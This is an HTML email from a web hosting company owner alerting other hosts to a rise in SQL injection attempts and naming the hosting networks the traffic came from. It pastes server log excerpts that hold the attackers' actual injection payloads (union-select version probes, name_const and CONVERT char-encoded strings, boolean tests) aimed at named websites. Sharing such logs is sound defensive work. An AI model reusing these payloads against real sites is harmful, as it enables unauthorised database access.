<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<body>
<p><font face="Calibri">Hey HT web hosts out there,</font></p>
<p><font face="Calibri">Due to recent hacking attempts against our
servers, I have installed an IP Tracker that tracks and blocks
any aggressive activity.</font></p>
<p><font face="Calibri">Starting late last week we've found a
growing number of IP numbers that appear to be attempting SQL
Injection attacks. I've pasted a few snippets from our logs,
below.</font></p>
<p><font face="Calibri">Anyone else seeing this kind of activity on
their servers? Every time I block an IP number they move to
another IP number. The list of IPs hitting us is growing, and
moving across multiple hosts.<br>
</font></p>
<p><font face="Calibri">So far, I've contacted four different server
hosts about the traffic coming from their servers. By far the
most "infected" appears to be the Unified Layer family of
hosting companies, which includes HostGator Mexico, webhostbox
Bigrock India, and a number of others. Additional sources of the
attacks are Hetzner.com from Germany; Ozkula from Turkey; and
ColoCrossing from Buffalo NY. I'm sure more will be added as the
days go on.<br>
</font></p>
<p><font face="Calibri">Stay safe.</font></p>
<p><font face="Calibri">Mik<br>
</font></p>
<pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A
94.130.76.249 13:38:47 fitzgerald-realestate.com /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1
94.130.76.249 13:39:01 fitzgerald-realestate.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
94.130.76.249 13:39:03 fitzgerald-realestate.com /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
94.130.76.249 13:39:04 fitzgerald-realestate.com /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
94.130.76.249 13:39:06 fitzgerald-realestate.com /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
94.130.76.249 13:39:07 fitzgerald-realestate.com /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x
94.130.76.249 13:39:09 fitzgerald-realestate.com /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x
</font></font></pre>
<p><br>
</p>
<pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">37.247.110.108 08:14:38 Greenfield-MA.gov /z term=Licensing%20AND%201=1
37.247.110.108 08:14:42 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
37.247.110.108 08:14:44 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
37.247.110.108 08:14:46 Greenfield-MA.gov /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
</font></font></pre>
<p><font face="Calibri"></font><br>
</p>
<pre class="moz-signature" cols="72"><font face="Courier New, Courier, monospace"><font size="-1">192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing
192.3.204.226 14:58:56 Greenfield-MA.gov /z term=Licensing2121121121212/1
192.3.204.226 14:58:57 Greenfield-MA.gov /z term=Licensing%20AND%201=1
192.3.204.226 14:58:59 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
192.3.204.226 14:59:00 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
</font> </font></pre>
<pre class="moz-signature" cols="72">--
---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
<a class="moz-txt-link-freetext" href="http://MontagueWebWorks.com">http://MontagueWebWorks.com</a>
Powered by ROCKETFUSION</pre>
</body>
</html>